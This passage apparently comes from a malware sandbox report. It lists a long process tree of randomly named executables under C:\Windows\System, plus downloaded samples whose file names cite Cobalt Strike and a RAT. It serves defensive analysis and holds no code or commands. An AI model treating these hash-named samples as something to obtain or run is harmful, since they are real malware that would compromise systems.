      PID:15428
  - - C:\Windows\System\FggCQqL.exe
      C:\Windows\System\FggCQqL.exe
      4⤵
      PID:15452
  - - C:\Windows\System\jmSUYgJ.exe
      C:\Windows\System\jmSUYgJ.exe
      4⤵
      PID:15476
  - - C:\Windows\System\ecdgtnL.exe
      C:\Windows\System\ecdgtnL.exe
      4⤵
      PID:15500
  - - C:\Windows\System\ndwgWWH.exe
      C:\Windows\System\ndwgWWH.exe
      4⤵
      PID:15520
  - - C:\Windows\System\FcUPqEE.exe
      C:\Windows\System\FcUPqEE.exe
      4⤵
      PID:15536
  - - C:\Windows\System\uaZAgam.exe
      C:\Windows\System\uaZAgam.exe
      4⤵
      PID:15556
  - - C:\Windows\System\ZKoaPDA.exe
      C:\Windows\System\ZKoaPDA.exe
      4⤵
      PID:15576
  - - C:\Windows\System\RpOXGNS.exe
      C:\Windows\System\RpOXGNS.exe
      4⤵
      PID:15592
  - - C:\Windows\System\elUtdKw.exe
      C:\Windows\System\elUtdKw.exe
      4⤵
      PID:15608
  - - C:\Windows\System\bUpZAAC.exe
      C:\Windows\System\bUpZAAC.exe
      4⤵
      PID:15624
  - - C:\Windows\System\RNfdAHK.exe
      C:\Windows\System\RNfdAHK.exe
      4⤵
      PID:15640
  - - C:\Windows\System\sLOoakI.exe
      C:\Windows\System\sLOoakI.exe
      4⤵
      PID:15656
  - - C:\Windows\System\oZNxYbu.exe
      C:\Windows\System\oZNxYbu.exe
      4⤵
      PID:15672
  - - C:\Windows\System\FyJGjbN.exe
      C:\Windows\System\FyJGjbN.exe
      4⤵
      PID:15688
  - - C:\Windows\System\nlnhhKr.exe
      C:\Windows\System\nlnhhKr.exe
      4⤵
      PID:15704
  - - C:\Windows\System\BaVhbee.exe
      C:\Windows\System\BaVhbee.exe
      4⤵
      PID:15732
  - - C:\Windows\System\vaZTuMw.exe
      C:\Windows\System\vaZTuMw.exe
      4⤵
      PID:15748
  - - C:\Windows\System\QmEqJQd.exe
      C:\Windows\System\QmEqJQd.exe
      4⤵
      PID:15780
  - - C:\Windows\System\SpBtbgT.exe
      C:\Windows\System\SpBtbgT.exe
      4⤵
      PID:15796
  - - C:\Windows\System\DXIRhtf.exe
      C:\Windows\System\DXIRhtf.exe
      4⤵
      PID:15812
  - - C:\Windows\System\lGIsBcW.exe
      C:\Windows\System\lGIsBcW.exe
      4⤵
      PID:15840
  - - C:\Windows\System\yFZUfbl.exe
      C:\Windows\System\yFZUfbl.exe
      4⤵
      PID:15856
  - - C:\Windows\System\tbYGPFS.exe
      C:\Windows\System\tbYGPFS.exe
      4⤵
      PID:15876
  - - C:\Windows\System\npApkxl.exe
      C:\Windows\System\npApkxl.exe
      4⤵
      PID:15904
  - - C:\Windows\System\KLKfQBN.exe
      C:\Windows\System\KLKfQBN.exe
      4⤵
      PID:15928
  - - C:\Windows\System\xVnzVyG.exe
      C:\Windows\System\xVnzVyG.exe
      4⤵
      PID:15948
  - - C:\Windows\System\fIZAhxX.exe
      C:\Windows\System\fIZAhxX.exe
      4⤵
      PID:15964
  - - C:\Windows\System\BBDlvaT.exe
      C:\Windows\System\BBDlvaT.exe
      4⤵
      PID:15980
  - - C:\Windows\System\EhlvgAe.exe
      C:\Windows\System\EhlvgAe.exe
      4⤵
      PID:15996
  - - C:\Windows\System\NYrDSXZ.exe
      C:\Windows\System\NYrDSXZ.exe
      4⤵
      PID:16016
  - - C:\Windows\System\DfpUMFW.exe
      C:\Windows\System\DfpUMFW.exe
      4⤵
      PID:16036
  - - C:\Windows\System\fqULvBf.exe
      C:\Windows\System\fqULvBf.exe
      4⤵
      PID:16052
  - - C:\Windows\System\eMdIHAM.exe
      C:\Windows\System\eMdIHAM.exe
      4⤵
      PID:16068
  - - C:\Windows\System\yEtZIbD.exe
      C:\Windows\System\yEtZIbD.exe
      4⤵
      PID:16088
  - - C:\Windows\System\HKGwfda.exe
      C:\Windows\System\HKGwfda.exe
      4⤵
      PID:16104
  - - C:\Windows\System\JOgvntN.exe
      C:\Windows\System\JOgvntN.exe
      4⤵
      PID:16128
  - - C:\Windows\System\MDsuyXu.exe
      C:\Windows\System\MDsuyXu.exe
      4⤵
      PID:16144
  - - C:\Windows\System\NYYlqnD.exe
      C:\Windows\System\NYYlqnD.exe
      4⤵
      PID:16160
  - - C:\Windows\System\gMkFppA.exe
      C:\Windows\System\gMkFppA.exe
      4⤵
      PID:16176
  - - C:\Windows\System\PwMhlDb.exe
      C:\Windows\System\PwMhlDb.exe
      4⤵
      PID:16192
  - - C:\Windows\System\yswVIUC.exe
      C:\Windows\System\yswVIUC.exe
      4⤵
      PID:16208
  - - C:\Windows\System\OKslCwo.exe
      C:\Windows\System\OKslCwo.exe
      4⤵
      PID:16224
  - - C:\Windows\System\eQKSRco.exe
      C:\Windows\System\eQKSRco.exe
      4⤵
      PID:16252
  - - C:\Windows\System\AUHvOQA.exe
      C:\Windows\System\AUHvOQA.exe
      4⤵
      PID:16272
  - - C:\Windows\System\aRSzGFJ.exe
      C:\Windows\System\aRSzGFJ.exe
      4⤵
      PID:16288
  - - C:\Windows\System\sXsULLN.exe
      C:\Windows\System\sXsULLN.exe
      4⤵
      PID:16304
  - - C:\Windows\System\IidFPYg.exe
      C:\Windows\System\IidFPYg.exe
      4⤵
      PID:16320
  - - C:\Windows\System\gbSeOUq.exe
      C:\Windows\System\gbSeOUq.exe
      4⤵
      PID:16344
  - - C:\Windows\System\NLgscDD.exe
      C:\Windows\System\NLgscDD.exe
      4⤵
      PID:16360
  - - C:\Windows\System\PWJNGZm.exe
      C:\Windows\System\PWJNGZm.exe
      4⤵
      PID:16376
  - - C:\Windows\System\bGZwshR.exe
      C:\Windows\System\bGZwshR.exe
      4⤵
      PID:11884
  - - C:\Windows\System\fJPrHbh.exe
      C:\Windows\System\fJPrHbh.exe
      4⤵
      PID:12096
  - - C:\Windows\System\SrIhctU.exe
      C:\Windows\System\SrIhctU.exe
      4⤵
      PID:16404
  - - C:\Windows\System\mgJhZTJ.exe
      C:\Windows\System\mgJhZTJ.exe
      4⤵
      PID:16428
  - - C:\Windows\System\TBoQvJf.exe
      C:\Windows\System\TBoQvJf.exe
      4⤵
      PID:16452
  - - C:\Windows\System\VyIKcWM.exe
      C:\Windows\System\VyIKcWM.exe
      4⤵
      PID:16468
  - - C:\Windows\System\HmoESHd.exe
      C:\Windows\System\HmoESHd.exe
      4⤵
      PID:16484
  - - C:\Windows\System\IvpsmUn.exe
      C:\Windows\System\IvpsmUn.exe
      4⤵
      PID:16500
  - - C:\Windows\System\bQjlYfH.exe
      C:\Windows\System\bQjlYfH.exe
      4⤵
      PID:16516
  - - C:\Windows\System\zZqVQKe.exe
      C:\Windows\System\zZqVQKe.exe
      4⤵
      PID:16532
  - - C:\Windows\System\KrQXrlk.exe
      C:\Windows\System\KrQXrlk.exe
      4⤵
      PID:16552
  - - C:\Windows\System\UiVlbWJ.exe
      C:\Windows\System\UiVlbWJ.exe
      4⤵
      PID:16568
  - - C:\Windows\System\iwpWGhd.exe
      C:\Windows\System\iwpWGhd.exe
      4⤵
      PID:16584
  - - C:\Windows\System\XZgiYCn.exe
      C:\Windows\System\XZgiYCn.exe
      4⤵
      PID:16600
  - - C:\Windows\System\OTcWOSn.exe
      C:\Windows\System\OTcWOSn.exe
      4⤵
      PID:16616
  - - C:\Windows\System\dPlzzcz.exe
      C:\Windows\System\dPlzzcz.exe
      4⤵
      PID:16632
  - - C:\Windows\System\XxMdiGb.exe
      C:\Windows\System\XxMdiGb.exe
      4⤵
      PID:16648
  - - C:\Windows\System\eBhYfck.exe
      C:\Windows\System\eBhYfck.exe
      4⤵
      PID:16664
  - - C:\Windows\System\rOgTiPB.exe
      C:\Windows\System\rOgTiPB.exe
      4⤵
      PID:16680
  - - C:\Windows\System\YRXqwlW.exe
      C:\Windows\System\YRXqwlW.exe
      4⤵
      PID:16696
  - - C:\Windows\System\oGHNafR.exe
      C:\Windows\System\oGHNafR.exe
      4⤵
      PID:16716
  - - C:\Windows\System\jehWSGg.exe
      C:\Windows\System\jehWSGg.exe
      4⤵
      PID:16732
  - - C:\Windows\System\lqNxwXC.exe
      C:\Windows\System\lqNxwXC.exe
      4⤵
      PID:16752
  - - C:\Windows\System\eWKASOl.exe
      C:\Windows\System\eWKASOl.exe
      4⤵
      PID:16768
  - - C:\Windows\System\dztwdzJ.exe
      C:\Windows\System\dztwdzJ.exe
      4⤵
      PID:16784
  - - C:\Windows\System\XWKzizt.exe
      C:\Windows\System\XWKzizt.exe
      4⤵
      PID:16800
  - - C:\Windows\System\kWjaXLm.exe
      C:\Windows\System\kWjaXLm.exe
      4⤵
      PID:16820
  - - C:\Windows\System\MPgqnei.exe
      C:\Windows\System\MPgqnei.exe
      4⤵
      PID:16836
  - - C:\Windows\System\XDmJDRM.exe
      C:\Windows\System\XDmJDRM.exe
      4⤵
      PID:16852
  - - C:\Windows\System\PhxluLV.exe
      C:\Windows\System\PhxluLV.exe
      4⤵
      PID:16872
  - - C:\Windows\System\soKfstm.exe
      C:\Windows\System\soKfstm.exe
      4⤵
      PID:16888
  - - C:\Windows\System\zdQkdAh.exe
      C:\Windows\System\zdQkdAh.exe
      4⤵
      PID:16904
  - - C:\Windows\System\iicGjln.exe
      C:\Windows\System\iicGjln.exe
      4⤵
      PID:16920
  - - C:\Windows\System\sYMaqgZ.exe
      C:\Windows\System\sYMaqgZ.exe
      4⤵
      PID:16940
  - - C:\Windows\System\nVypoTF.exe
      C:\Windows\System\nVypoTF.exe
      4⤵
      PID:16956
  - - C:\Windows\System\DbgakdL.exe
      C:\Windows\System\DbgakdL.exe
      4⤵
      PID:17008
  - - C:\Windows\System\hXlFvQe.exe
      C:\Windows\System\hXlFvQe.exe
      4⤵
      PID:17028
  - - C:\Windows\System\eAFPZOt.exe
      C:\Windows\System\eAFPZOt.exe
      4⤵
      PID:17052
  - - C:\Windows\System\vOangMy.exe
      C:\Windows\System\vOangMy.exe
      4⤵
      PID:17072
  - - C:\Windows\System\uRyxJhF.exe
      C:\Windows\System\uRyxJhF.exe
      4⤵
      PID:17088
  - - C:\Windows\System\MdWalCh.exe
      C:\Windows\System\MdWalCh.exe
      4⤵
      PID:17104
  - - C:\Windows\System\hQmZBci.exe
      C:\Windows\System\hQmZBci.exe
      4⤵
      PID:17120
  - - C:\Windows\System\FBROIIw.exe
      C:\Windows\System\FBROIIw.exe
      4⤵
      PID:17136
  - - C:\Windows\System\BtzIQZh.exe
      C:\Windows\System\BtzIQZh.exe
      4⤵
      PID:17152
  - - C:\Windows\System\LfFEHmF.exe
      C:\Windows\System\LfFEHmF.exe
      4⤵
      PID:17176
  - - C:\Windows\System\JPcExxY.exe
      C:\Windows\System\JPcExxY.exe
      4⤵
      PID:17192
  - - C:\Windows\System\lPqSgdW.exe
      C:\Windows\System\lPqSgdW.exe
      4⤵
      PID:17208
  - - C:\Windows\System\bLWbmqo.exe
      C:\Windows\System\bLWbmqo.exe
      4⤵
      PID:17224
  - - C:\Windows\System\rtaTcSU.exe
      C:\Windows\System\rtaTcSU.exe
      4⤵
      PID:17240
  - - C:\Windows\System\mTKdwRA.exe
      C:\Windows\System\mTKdwRA.exe
      4⤵
      PID:17256
  - - C:\Windows\System\cFIDgzU.exe
      C:\Windows\System\cFIDgzU.exe
      4⤵
      PID:17276
  - - C:\Windows\System\lweNaUB.exe
      C:\Windows\System\lweNaUB.exe
      4⤵
      PID:17296
  - - C:\Windows\System\TiKrdNC.exe
      C:\Windows\System\TiKrdNC.exe
      4⤵
      PID:17312
  - - C:\Windows\System\djMvpbQ.exe
      C:\Windows\System\djMvpbQ.exe
      4⤵
      PID:17328
  - - C:\Windows\System\FgYpAon.exe
      C:\Windows\System\FgYpAon.exe
      4⤵
      PID:17344
  - - C:\Windows\System\vfxxLTt.exe
      C:\Windows\System\vfxxLTt.exe
      4⤵
      PID:17360
  - - C:\Windows\System\TKwuJNU.exe
      C:\Windows\System\TKwuJNU.exe
      4⤵
      PID:17380
  - - C:\Windows\System\nOqhgnZ.exe
      C:\Windows\System\nOqhgnZ.exe
      4⤵
      PID:17396
  - - C:\Windows\System\NpeuRwI.exe
      C:\Windows\System\NpeuRwI.exe
      4⤵
      PID:14972
  - - C:\Windows\System\cbNAouh.exe
      C:\Windows\System\cbNAouh.exe
      4⤵
      PID:12252
  - - C:\Windows\System\rwdTBRj.exe
      C:\Windows\System\rwdTBRj.exe
      4⤵
      PID:17420
  - - C:\Windows\System\ImGGSqf.exe
      C:\Windows\System\ImGGSqf.exe
      4⤵
      PID:17440
  - - C:\Windows\System\QKXuxTv.exe
      C:\Windows\System\QKXuxTv.exe
      4⤵
      PID:17464
  - - C:\Windows\System\hrLuWtN.exe
      C:\Windows\System\hrLuWtN.exe
      4⤵
      PID:17484
  - - C:\Windows\System\qhhTIhs.exe
      C:\Windows\System\qhhTIhs.exe
      4⤵
      PID:17504
  - - C:\Windows\System\eQcaWwk.exe
      C:\Windows\System\eQcaWwk.exe
      4⤵
      PID:17524
  - - C:\Windows\System\hWdblRv.exe
      C:\Windows\System\hWdblRv.exe
      4⤵
      PID:17548
  - - C:\Windows\System\WfysxWo.exe
      C:\Windows\System\WfysxWo.exe
      4⤵
      PID:17568
  - - C:\Windows\System\fdMLwRr.exe
      C:\Windows\System\fdMLwRr.exe
      4⤵
      PID:17588
  - - C:\Windows\System\LrTStTw.exe
      C:\Windows\System\LrTStTw.exe
      4⤵
      PID:17608
  - - C:\Windows\System\wLvooSe.exe
      C:\Windows\System\wLvooSe.exe
      4⤵
      PID:17628
  - - C:\Windows\System\PwEKABf.exe
      C:\Windows\System\PwEKABf.exe
      4⤵
      PID:17664
  - - C:\Windows\System\WorUCay.exe
      C:\Windows\System\WorUCay.exe
      4⤵
      PID:17684
  - - C:\Windows\System\LLjxfkF.exe
      C:\Windows\System\LLjxfkF.exe
      4⤵
      PID:17700
  - - C:\Windows\System\thaFDMQ.exe
      C:\Windows\System\thaFDMQ.exe
      4⤵
      PID:17732
  - - C:\Windows\System\dCVdOEQ.exe
      C:\Windows\System\dCVdOEQ.exe
      4⤵
      PID:17784
  - - C:\Windows\System\AeRcUUC.exe
      C:\Windows\System\AeRcUUC.exe
      4⤵
      PID:17832
  - - C:\Windows\System\OpJfdDZ.exe
      C:\Windows\System\OpJfdDZ.exe
      4⤵
      PID:17848
  - - C:\Windows\System\brVZKWm.exe
      C:\Windows\System\brVZKWm.exe
      4⤵
      PID:17864
  - - C:\Windows\System\Vwvgumq.exe
      C:\Windows\System\Vwvgumq.exe
      4⤵
      PID:17888
  - - C:\Windows\System\HCKDniU.exe
      C:\Windows\System\HCKDniU.exe
      4⤵
      PID:17944
  - - C:\Windows\System\ZTADLDl.exe
      C:\Windows\System\ZTADLDl.exe
      4⤵
      PID:17976
  - - C:\Windows\System\IYUjJtb.exe
      C:\Windows\System\IYUjJtb.exe
      4⤵
      PID:18040
  - - C:\Windows\System\StOzvod.exe
      C:\Windows\System\StOzvod.exe
      4⤵
      PID:18080
  - - C:\Windows\System\ccILvUS.exe
      C:\Windows\System\ccILvUS.exe
      4⤵
      PID:18096
  - - C:\Windows\System\gnDaSqA.exe
      C:\Windows\System\gnDaSqA.exe
      4⤵
      PID:18120
  - - C:\Windows\System\Oqgctrz.exe
      C:\Windows\System\Oqgctrz.exe
      4⤵
      PID:18136
  - - C:\Windows\System\ETuAgGi.exe
      C:\Windows\System\ETuAgGi.exe
      4⤵
      PID:18152
  - - C:\Windows\System\rUHQDBC.exe
      C:\Windows\System\rUHQDBC.exe
      4⤵
      PID:18184
  - - C:\Windows\System\OIEptax.exe
      C:\Windows\System\OIEptax.exe
      4⤵
      PID:18208
  - - C:\Windows\System\yIFgDwT.exe
      C:\Windows\System\yIFgDwT.exe
      4⤵
      PID:18228
  - - C:\Windows\System\EGkWSJu.exe
      C:\Windows\System\EGkWSJu.exe
      4⤵
      PID:18260
  - - C:\Windows\System\buKdEkl.exe
      C:\Windows\System\buKdEkl.exe
      4⤵
      PID:18304
  - - C:\Windows\System\VhxWppG.exe
      C:\Windows\System\VhxWppG.exe
      4⤵
      PID:18332
  - - C:\Windows\System\pcxqNfb.exe
      C:\Windows\System\pcxqNfb.exe
      4⤵
      PID:18388
  - - C:\Windows\System\osZXljX.exe
      C:\Windows\System\osZXljX.exe
      4⤵
      PID:12616
  - - C:\Windows\System\QMGcXrJ.exe
      C:\Windows\System\QMGcXrJ.exe
      4⤵
      PID:8196
  - - C:\Windows\System\pYbnVPy.exe
      C:\Windows\System\pYbnVPy.exe
      4⤵
      PID:13128
  - - C:\Windows\System\QlyfwEp.exe
      C:\Windows\System\QlyfwEp.exe
      4⤵
      PID:5208
  - - C:\Windows\System\mYtrnKd.exe
      C:\Windows\System\mYtrnKd.exe
      4⤵
      PID:13252
  - - C:\Windows\System\RqJYCYa.exe
      C:\Windows\System\RqJYCYa.exe
      4⤵
      PID:9100
  - - C:\Windows\System\zHBuiyA.exe
      C:\Windows\System\zHBuiyA.exe
      4⤵
      PID:11068
  - - C:\Windows\System\cWXrzAu.exe
      C:\Windows\System\cWXrzAu.exe
      4⤵
      PID:8200
  - - C:\Windows\System\qiZoyDp.exe
      C:\Windows\System\qiZoyDp.exe
      4⤵
      PID:6088
  - - C:\Windows\System\UufpJml.exe
      C:\Windows\System\UufpJml.exe
      4⤵
      PID:13316
  - - C:\Windows\System\ZmSgGqG.exe
      C:\Windows\System\ZmSgGqG.exe
      4⤵
      PID:4840
  - - C:\Windows\System\YgRvpqM.exe
      C:\Windows\System\YgRvpqM.exe
      4⤵
      PID:10736
  - - C:\Windows\System\LdeskHU.exe
      C:\Windows\System\LdeskHU.exe
      4⤵
      PID:13704
  - - C:\Windows\System\UWHzkLQ.exe
      C:\Windows\System\UWHzkLQ.exe
      4⤵
      PID:8988
  - - C:\Windows\System\ynRfAfm.exe
      C:\Windows\System\ynRfAfm.exe
      4⤵
      PID:9960
  - - C:\Windows\System\JJtnsPn.exe
      C:\Windows\System\JJtnsPn.exe
      4⤵
      PID:9856
  - - C:\Windows\System\bHKmurK.exe
      C:\Windows\System\bHKmurK.exe
      4⤵
      PID:8560
  - - C:\Windows\System\SRWbeVN.exe
      C:\Windows\System\SRWbeVN.exe
      4⤵
      PID:11792
  - - C:\Windows\System\fWWtHSr.exe
      C:\Windows\System\fWWtHSr.exe
      4⤵
      PID:18460
  - - C:\Windows\System\ercMuFL.exe
      C:\Windows\System\ercMuFL.exe
      4⤵
      PID:18492
  - - C:\Windows\System\OhfrQRj.exe
      C:\Windows\System\OhfrQRj.exe
      4⤵
      PID:18516
  - - C:\Windows\System\HrSowmS.exe
      C:\Windows\System\HrSowmS.exe
      4⤵
      PID:18532
  - - C:\Windows\System\pGcuFCv.exe
      C:\Windows\System\pGcuFCv.exe
      4⤵
      PID:18548
  - - C:\Windows\System\CLCzHQA.exe
      C:\Windows\System\CLCzHQA.exe
      4⤵
      PID:18564
  - - C:\Windows\System\iRoRXQT.exe
      C:\Windows\System\iRoRXQT.exe
      4⤵
      PID:18620
  - - C:\Windows\System\mvBrtop.exe
      C:\Windows\System\mvBrtop.exe
      4⤵
      PID:18636
  - - C:\Windows\System\fvyDkOR.exe
      C:\Windows\System\fvyDkOR.exe
      4⤵
      PID:18692
  - - C:\Windows\System\LUenNFT.exe
      C:\Windows\System\LUenNFT.exe
      4⤵
      PID:18712
  - - C:\Windows\System\JpQLBdV.exe
      C:\Windows\System\JpQLBdV.exe
      4⤵
      PID:18728
  - - C:\Windows\System\NsKrMXS.exe
      C:\Windows\System\NsKrMXS.exe
      4⤵
      PID:18784
  - - C:\Windows\System\eRhfIih.exe
      C:\Windows\System\eRhfIih.exe
      4⤵
      PID:18804
  - - C:\Windows\System\cOKnSKS.exe
      C:\Windows\System\cOKnSKS.exe
      4⤵
      PID:18820
  - - C:\Windows\System\JoRvTeJ.exe
      C:\Windows\System\JoRvTeJ.exe
      4⤵
      PID:18840
  - - C:\Windows\System\AhJAtPx.exe
      C:\Windows\System\AhJAtPx.exe
      4⤵
      PID:18868
  - - C:\Windows\System\VVPRQVf.exe
      C:\Windows\System\VVPRQVf.exe
      4⤵
      PID:18888
  - - C:\Windows\System\DFumszg.exe
      C:\Windows\System\DFumszg.exe
      4⤵
      PID:18904
  - - C:\Windows\System\vZvmoxY.exe
      C:\Windows\System\vZvmoxY.exe
      4⤵
      PID:18920
  - - C:\Windows\System\gqihxYz.exe
      C:\Windows\System\gqihxYz.exe
      4⤵
      PID:18944
  - - C:\Windows\System\gBhzLVF.exe
      C:\Windows\System\gBhzLVF.exe
      4⤵
      PID:18960
  - - C:\Windows\System\SKHMUKp.exe
      C:\Windows\System\SKHMUKp.exe
      4⤵
      PID:18976
  - - C:\Windows\System\YJKuPfI.exe
      C:\Windows\System\YJKuPfI.exe
      4⤵
      PID:18992
  - - C:\Windows\System\fRkAhmP.exe
      C:\Windows\System\fRkAhmP.exe
      4⤵
      PID:19008
  - - C:\Windows\System\AEqHtKU.exe
      C:\Windows\System\AEqHtKU.exe
      4⤵
      PID:19024
  - - C:\Windows\System\MHLQoyD.exe
      C:\Windows\System\MHLQoyD.exe
      4⤵
      PID:19040
  - - C:\Windows\System\jZutcOn.exe
      C:\Windows\System\jZutcOn.exe
      4⤵
      PID:19056
  - - C:\Windows\System\vukIYUO.exe
      C:\Windows\System\vukIYUO.exe
      4⤵
      PID:19072
  - - C:\Windows\System\RhhKGKA.exe
      C:\Windows\System\RhhKGKA.exe
      4⤵
      PID:19088
  - - C:\Windows\System\dxhYVOx.exe
      C:\Windows\System\dxhYVOx.exe
      4⤵
      PID:19104
  - - C:\Windows\System\pyBiaHf.exe
      C:\Windows\System\pyBiaHf.exe
      4⤵
      PID:19120
  - - C:\Windows\System\xwoZlkP.exe
      C:\Windows\System\xwoZlkP.exe
      4⤵
      PID:19136
  - - C:\Windows\System\BUkmimq.exe
      C:\Windows\System\BUkmimq.exe
      4⤵
      PID:19156
  - - C:\Windows\System\zGYduYo.exe
      C:\Windows\System\zGYduYo.exe
      4⤵
      PID:19172
  - - C:\Windows\System\BUQLEIp.exe
      C:\Windows\System\BUQLEIp.exe
      4⤵
      PID:19196
  - - C:\Windows\System\kILTzkz.exe
      C:\Windows\System\kILTzkz.exe
      4⤵
      PID:19240
  - - C:\Windows\System\PEZEPzV.exe
      C:\Windows\System\PEZEPzV.exe
      4⤵
      PID:19264
  - - C:\Windows\System\HIxOxEQ.exe
      C:\Windows\System\HIxOxEQ.exe
      4⤵
      PID:19308
  - - C:\Windows\System\hNVkPAt.exe
      C:\Windows\System\hNVkPAt.exe
      4⤵
      PID:19340
  - - C:\Windows\System\UacVeJk.exe
      C:\Windows\System\UacVeJk.exe
      4⤵
      PID:19380
  - - C:\Windows\System\mDsfudx.exe
      C:\Windows\System\mDsfudx.exe
      4⤵
      PID:19420
  - - C:\Windows\System\PSrsXgK.exe
      C:\Windows\System\PSrsXgK.exe
      4⤵
      PID:19452
  - - C:\Windows\System\JPBdcMq.exe
      C:\Windows\System\JPBdcMq.exe
      4⤵
      PID:15896
  - - C:\Windows\System\oXkLvIV.exe
      C:\Windows\System\oXkLvIV.exe
      4⤵
      PID:15972
  - - C:\Windows\System\RsokoWR.exe
      C:\Windows\System\RsokoWR.exe
      4⤵
      PID:16076
  - - C:\Windows\System\DCiEslA.exe
      C:\Windows\System\DCiEslA.exe
      4⤵
      PID:16140
  - - C:\Windows\System\sHcnWQq.exe
      C:\Windows\System\sHcnWQq.exe
      4⤵
      PID:16264
  - - C:\Windows\System\ZdYXgRQ.exe
      C:\Windows\System\ZdYXgRQ.exe
      4⤵
      PID:14748
  - - C:\Windows\System\HOqHOOi.exe
      C:\Windows\System\HOqHOOi.exe
      4⤵
      PID:14812
  - - C:\Windows\System\XYvKMHG.exe
      C:\Windows\System\XYvKMHG.exe
      4⤵
      PID:16424
  - - C:\Windows\System\NWgzxfy.exe
      C:\Windows\System\NWgzxfy.exe
      4⤵
      PID:4632
  - - C:\Windows\System\fSmdcbu.exe
      C:\Windows\System\fSmdcbu.exe
      4⤵
      PID:10076
  - - C:\Windows\System\XDROIcH.exe
      C:\Windows\System\XDROIcH.exe
      4⤵
      PID:17232
  - - C:\Windows\System\KkGOxDJ.exe
      C:\Windows\System\KkGOxDJ.exe
      4⤵
      PID:19484
  - - C:\Windows\System\ADDQHCI.exe
      C:\Windows\System\ADDQHCI.exe
      4⤵
      PID:19528
  - - C:\Windows\System\jabumHL.exe
      C:\Windows\System\jabumHL.exe
      4⤵
      PID:19560
  - - C:\Windows\System\rGoeZcl.exe
      C:\Windows\System\rGoeZcl.exe
      4⤵
      PID:19604
  - - C:\Windows\System\JMRZunR.exe
      C:\Windows\System\JMRZunR.exe
      4⤵
      PID:19644
  - - C:\Windows\System\lPWAjRz.exe
      C:\Windows\System\lPWAjRz.exe
      4⤵
      PID:19676
  - - C:\Windows\System\lDKBEVS.exe
      C:\Windows\System\lDKBEVS.exe
      4⤵
      PID:19708
  - - C:\Windows\System\OcJGgsH.exe
      C:\Windows\System\OcJGgsH.exe
      4⤵
      PID:19756
- - C:\Users\Admin\Downloads\240919-hne2pawbrb9fab9a4edeffdb93b4909efb9ec451b0d695ad2fc672dd34c62f391b42a61d35N.exe
    C:\Users\Admin\Downloads\240919-hne2pawbrb9fab9a4edeffdb93b4909efb9ec451b0d695ad2fc672dd34c62f391b42a61d35N.exe
    3⤵
    PID:10300
  - - C:\Windows\SysWOW64\Bfedoc32.exe
      C:\Windows\system32\Bfedoc32.exe
      4⤵
      PID:11492
- - C:\Users\Admin\Downloads\240919-htjbaswejceacf717f23652f7fbbd15626dc55e8b8_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-htjbaswejceacf717f23652f7fbbd15626dc55e8b8_JaffaCakes118.exe
    3⤵
    PID:10324
- - C:\Users\Admin\Downloads\240919-hw5bjswfjcead0ff047e5a4f6360c358b7f88cabc5_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hw5bjswfjcead0ff047e5a4f6360c358b7f88cabc5_JaffaCakes118.exe
    3⤵
    PID:10336
- - C:\Users\Admin\Downloads\240919-hx815awhnpf47247a19799dec276ddfaf5204650b1c3c581bb96139709f61b7f89ea54f979N.exe
    C:\Users\Admin\Downloads\240919-hx815awhnpf47247a19799dec276ddfaf5204650b1c3c581bb96139709f61b7f89ea54f979N.exe
    3⤵
    PID:11536
- - C:\Users\Admin\Downloads\240919-hjqydswcmn2024-09-19_12d68164717ebe302aacbdc4f0755235_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hjqydswcmn2024-09-19_12d68164717ebe302aacbdc4f0755235_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:11560
- - C:\Users\Admin\Downloads\240919-hl24fawbke51046434636ee20141e62e18698b72081872c53a39c2173df905bba4513b8f2fN.exe
    C:\Users\Admin\Downloads\240919-hl24fawbke51046434636ee20141e62e18698b72081872c53a39c2173df905bba4513b8f2fN.exe
    3⤵
    PID:8296
  - - C:\Windows\SysWOW64\Acfhad32.exe
      C:\Windows\system32\Acfhad32.exe
      4⤵
      PID:12580
    - - C:\Windows\SysWOW64\Ljclki32.exe
        
        C:\Windows\system32\Ljclki32.exe
        5⤵
        
        PID:19220
- - C:\Users\Admin\Downloads\240919-hsayjawfpjc6b90b755eb84c2f7125ab11d4012c01547b892503f5c612f7d8839381f6221fN.exe
    C:\Users\Admin\Downloads\240919-hsayjawfpjc6b90b755eb84c2f7125ab11d4012c01547b892503f5c612f7d8839381f6221fN.exe
    3⤵
    PID:11344
  - - C:\Windows\SysWOW64\Alqjpi32.exe
      C:\Windows\system32\Alqjpi32.exe
      4⤵
      PID:11500
    - - C:\Windows\SysWOW64\Kmaopfjm.exe
        
        C:\Windows\system32\Kmaopfjm.exe
        5⤵
        
        PID:13368
- - C:\Users\Admin\Downloads\240919-h3gttswhjh33d32caa2346f5bde47ad746065a3bd7ee53e40740c5801207eac99edb3138e1.exe
    C:\Users\Admin\Downloads\240919-h3gttswhjh33d32caa2346f5bde47ad746065a3bd7ee53e40740c5801207eac99edb3138e1.exe
    3⤵
    PID:11448
- - C:\Users\Admin\Downloads\240919-hz45yswgkdd1d39d7b0b8441937ebe4cfb6d238007062e1e881d80fbad4cfe2627d8be6cfcN.exe
    C:\Users\Admin\Downloads\240919-hz45yswgkdd1d39d7b0b8441937ebe4cfb6d238007062e1e881d80fbad4cfe2627d8be6cfcN.exe
    3⤵
    PID:10256
- - C:\Users\Admin\Downloads\240919-hqvvxswfjkeacd716e88ab706dfc44bb669b81c9ab_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hqvvxswfjkeacd716e88ab706dfc44bb669b81c9ab_JaffaCakes118.exe
    3⤵
    PID:10268
- - C:\Users\Admin\Downloads\240919-h2fv5sxarq8d48ecd87e0d6f6d97faf98647424cb176df35a64bfcbf6ea19382831d70cec7N.exe
    C:\Users\Admin\Downloads\240919-h2fv5sxarq8d48ecd87e0d6f6d97faf98647424cb176df35a64bfcbf6ea19382831d70cec7N.exe
    3⤵
    PID:10276
- - C:\Users\Admin\Downloads\240919-hyqaeawfpcead1fdb488cb0146d566afd8cefdca87_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hyqaeawfpcead1fdb488cb0146d566afd8cefdca87_JaffaCakes118.exe
    3⤵
    PID:10284
- - C:\Users\Admin\Downloads\240919-hs6p7swfrl27c7dedddce491cc9885bc3d9d8ac5e1c0f2433378ea2f734f6b5fb19f0fc5d5N.exe
    C:\Users\Admin\Downloads\240919-hs6p7swfrl27c7dedddce491cc9885bc3d9d8ac5e1c0f2433378ea2f734f6b5fb19f0fc5d5N.exe
    3⤵
    PID:10292
